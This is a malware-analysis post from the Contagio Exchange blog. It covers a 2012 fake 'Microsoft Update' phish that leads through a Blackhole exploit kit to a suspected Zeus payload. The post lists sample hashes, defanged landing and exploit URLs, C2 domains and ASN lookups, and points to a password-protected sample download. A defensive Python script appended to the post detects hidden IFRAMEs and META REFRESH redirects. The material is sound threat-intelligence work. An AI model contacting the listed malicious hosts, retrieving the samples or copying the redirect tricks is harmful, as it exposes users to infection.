About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become a useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Sunday, April 29, 2012

018 Crime "Microsoft Update" phish -> Blackhole exploit kit with Zeus payload - web - April 2012

File: KB971033.exe
Size: 201216
MD5:  EC750B75E83749C715D7834E130FCE8E

File: hnszs0.exe
Size: 184832
MD5:  9DB4174373601F74FCE0ECBC77A9577D

Sample credit Bryan Nolen

Download (pass infected)

│   investigation_notes.txt
│
├───dropped_files
│   ├───exe
│   │       hnszs0.exe
│   │       KB971033.exe
│   │
│   ├───java
│   │       jar_cache.zip
│   │
│   ├───pdf
│   │       ap1.pdf
│   │       ap2.pdf
│   │
│   └───swf
│           score.swf
│
├───(folder name not preserved)
│       MSUPDATE.eml
│
├───extracted_files
│       pid_1412_Explorer_Dumped.EXE
│
└───html
        exploit.html
        landing.html

Quick analysis made by Bryan Nolen

Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )

Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.

Analysis of the javascript was performed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).

The attack payloads are saved as
  • dropped_files/pdf/ap1.pdf 
  • dropped_files/pdf/ap2.pdf 
  • dropped_files/swf/score.swf 
  • dropped_files/java/jar_cache.zip

The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )

A copy of explorer.exe extracted from the memory image after infection is included; based on observations, this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)

PCAP is supplied in the pcap folder. The hosts identified in this malware are:

Landing Page:    volozhin.gov.by
Exploit Page:    fewfewfewfew.ibiz.cc
C2:              google-analytics-sv1.com
(alt C2):        localdomain01.com

Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.

Full memory dumps from my sandbox VM available on request.

I have a strong suspicion this is a Zeus variant.

-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>

Host / ASN lookups:

Host                  Country              ASN                                 Organisation
(host not preserved)  Belarus              AS12406 Business network j.v.       Business Network JV
(host not preserved)  Russian Federation   AS28762 AWAX Telecom Ltd            AWAX Telecom Ltd.
(host not preserved)  Russian Federation   AS57189 PE Spiridonova Vera Ana     OOO Aldevir Invest
localdomain01.com     Russian Federation   AS57189 PE Spiridonova Vera Ana     OOO Aldevir Invest
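The notes above describe the two redirect mechanisms in the saved landing page (a hidden IFRAME to the exploit page and a META REFRESH to the second binary) and list the hosts involved. The script below is an added example, not part of Bryan Nolen's notes or the Contagio material: it parses a saved HTML file with only the Python standard library, reports hidden IFRAMEs and META REFRESH targets, and flags any whose host appears in the investigation's host list. SAMPLE_LANDING is a constructed page modelled on the description, not the real html/landing.html; the function and class names are this example's own.

```python
"""Triage a saved landing page for hidden IFRAMEs and META REFRESH redirects
and flag any that point at hosts from the investigation's host list."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the investigation notes (landing, exploit, C2, alternate C2).
IOC_HOSTS = {
    "volozhin.gov.by",
    "fewfewfewfew.ibiz.cc",
    "google-analytics-sv1.com",
    "localdomain01.com",
}

# Constructed sample resembling the described landing page; not the real file.
SAMPLE_LANDING = """<html><head>
<meta http-equiv="refresh" content="5; url=http://volozhin.gov.by/pub/KB971033/KB971033.exe">
<title>Microsoft Update</title></head>
<body>
<p>Please wait while the update is prepared...</p>
<iframe src="http://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486"
        width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="http://example.com/visible" width="300" height="200"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.I)


def _attr_map(attrs):
    """HTMLParser hands attributes as (name, value) pairs; value may be None."""
    return {k.lower(): (v or "") for k, v in attrs}


def _is_hidden(attrs):
    """An IFRAME counts as hidden if it is zero-sized or styled invisible."""
    a = _attr_map(attrs)
    zero = (a.get("width", "").strip() in ("0", "0px")
            or a.get("height", "").strip() in ("0", "0px"))
    return zero or bool(HIDDEN_STYLE.search(a.get("style", "")))


class LandingPageParser(HTMLParser):
    """Collects (kind, url) findings for hidden IFRAMEs and META REFRESH tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = _attr_map(attrs)
        if tag == "iframe" and _is_hidden(attrs):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.search(a.get("content", ""))
            if m:
                self.findings.append(("meta_refresh", m.group(1).strip()))


def triage(html, ioc_hosts=IOC_HOSTS):
    """Return one dict per redirect indicator, in document order, with an
    ioc_hit flag set when the target host is in the known-host list."""
    parser = LandingPageParser()
    parser.feed(html)
    results = []
    for kind, url in parser.findings:
        host = (urlparse(url).hostname or "").lower()
        results.append({"kind": kind, "url": url, "host": host,
                        "ioc_hit": host in ioc_hosts})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_LANDING):
        flag = "IOC" if r["ioc_hit"] else "   "
        print(f"{flag} {r['kind']:14s} {r['host']:28s} {r['url']}")
```

Run it against a saved landing page by reading the file into `triage()`; a visible IFRAME (like the example.com one in the sample) is deliberately not reported, so only the zero-sized or invisible frames and the META REFRESH target surface, which keeps the output short enough to scan during triage.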